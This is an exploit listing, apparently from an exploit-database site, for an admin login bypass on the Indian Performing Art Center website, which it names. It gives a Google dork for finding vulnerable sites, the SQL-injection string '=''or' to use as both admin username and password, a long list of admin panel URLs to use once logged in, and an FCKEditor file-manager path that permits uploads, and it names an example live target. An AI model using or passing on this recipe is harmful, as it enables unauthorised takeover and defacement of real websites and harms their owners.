Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability

2018.06.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 08/06/2018 # Vendor Homepage : ipacglobal.com # Social Media Page : facebook.com/India-Performing-Arts-Center-249492318418992/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] * CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ] * CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Copyright © 2014- All Rights Reserved Press| Indian Performing Art Center ::'' # Admin Panel Login Path : /admin # Exploit : Login both for admin username and password as => '=''or' # Possible Admin Control Panel Useable URL Paths : /admin/editpages.php /admin/editpages.php?id=1 /admin/editpages.php?id=2 /admin/editpages.php?id=3 /admin/editpages.php?id=4 /admin/editpages.php?id=5 /admin/editpages.php?id=6 /admin/editpages.php?id=7 /admin/editpages.php?id=8 /admin/editpages.php?id=9 /admin/editpages.php?id=10 /admin/editpages.php?id=11 /admin/editpages.php?id=12 /admin/addcategory.php /admin/gallery.php?g_id=1 /admin/gallery.php?g_id=13 /admin/gallery.php?g_id=14 /admin/event.php /admin/event.php?addcat=addcat /admin/event.php?edit=edit&catid=1 /admin/videos.php /admin/videos.php?addcat=addcat /admin/videos.php?edit=edit&catid=1 /admin/fogana.php /admin/fogana.php?edit=edit&fogana=1 /admin/addtestmoni.php /admin/testimonials.php?edit=edit&catid=9 Add Image => /admin/addimage.php?action=add&g_id=1 Edit Image with Height and Width /admin/edit.php?g_id=1&action=del&pid=1&height=200&width=350 PATH => /products/flash/.... ################################################################################################# FCKEditor Vulnerability [ You can select File ~ Image ~ Flash ~ Media ] /admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http.//TARGETSITE/admin/fckeditor/editor/filemanager/connectors/php/Fconnector.php PATH => /admin/images/image/..... PATH => /admin/images/file/.... ################################################################################################# # Example Site => ipacglobal.com ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top